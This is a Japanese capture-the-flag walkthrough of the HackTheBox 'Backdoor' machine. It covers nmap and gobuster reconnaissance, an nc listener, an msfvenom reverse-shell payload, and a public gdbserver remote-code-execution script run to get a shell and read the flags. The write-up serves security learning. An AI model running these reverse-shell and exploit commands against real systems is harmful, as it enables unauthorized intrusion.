0
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?

【HackTheBox】Backdoor【Walkthrough】【WriteUp】

Posted at

セキュリティについて学び、Hack the Boxを取り組んだ記録

現在Active machineなのに、YouTubeに解説動画が挙がっている(1月13日)。
とりあえず、私もBackdoorのWalkthroughを書いておこうと思った。
これも参考にしたらいいよ!

YouTube解説動画

応援お願いします!

もしこの記事が役に立ったり、「おもしろそう!」と思った方は、ぜひ 「いいね」ボタン を押していただけると嬉しいです!みなさんの応援が、次のチャレンジへの大きな励みになります。💪

⚠️ ネタバレ注意 ⚠️

Step. 1 nmapスキャン

最初にマシーンをリセットすること!

指定されたIPアドレスをnmapスキャンすると、SSHとHTTPポートが開いていることが確認できる。

$ nmap -p- 10.10.11.125
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-13 22:25 JST
Nmap scan report for 10.10.11.125
Host is up (0.17s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT     STATE  SERVICE
22/tcp   open   ssh
80/tcp   open   http
1337/tcp open   waste
Nmap done: 1 IP address (1 host up) scanned in 1162.83 seconds

ポートが確認できたので、http://10.10.11.125/login.php で検索すると、ページが表示される。
20220202234221.png

  • http://10.129.188.167/wp-plugins/ に進む
    20220202234334.png

  • http://10.129.188.167/wp-plugins/ebook-download を確認
    20220202235539.png
    20220202234555.png

    • readme.txt が怪しいので確認するも、「はずれ」。

次に、Gobusterでディレクトリスキャンを試す。

$ gobuster dir -u http://10.10.11.125 -w /usr/share/dirb/wordlists/common.txt

20220202235539.png

WordPressが80番ポートで使用されているため、adminなどのIDとパスワードを試してログインを試みるが失敗。


Step. 2 脆弱性の発見

Gobusterを使用すると、gdbサーバーで動いていることが確認できる。
20220203000453.png

エクスプロイトを使用した攻撃

スクリプトをダウンロードし、ncコマンドで待ち受けポートを起動する。

$ nc -lvnp 4444

リバースシェル用のペイロードをmsfvenomコマンドで作成:

$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=xxxxxxx LPORT=4444 PrependFork=true -o shell.bin

xxxxは自身のIPアドレス。ifconfigコマンドで確認しておくと安心。


Step. 3 攻撃

ダウンロードしたスクリプトを使用して権限を奪取する(Python3で実行)。

python 50539.py 10.10.11.125:1337 shell.bin

4444ポートに戻って確認すると、きちんとユーザーになっている。
user.txtroot.txtcatコマンドで取得し、HPに戻って入力すればFlagを立てることができる。

参考

  1. Hack The Box 日本語 Walkthrough/Writeup まとめ - Security Index
  2. Backdoor HTB WP/Linux Enumeration - YouTube
  3. GNU gdbserver 9.2 - Remote Command Execution (RCE)
0
0
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
0
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?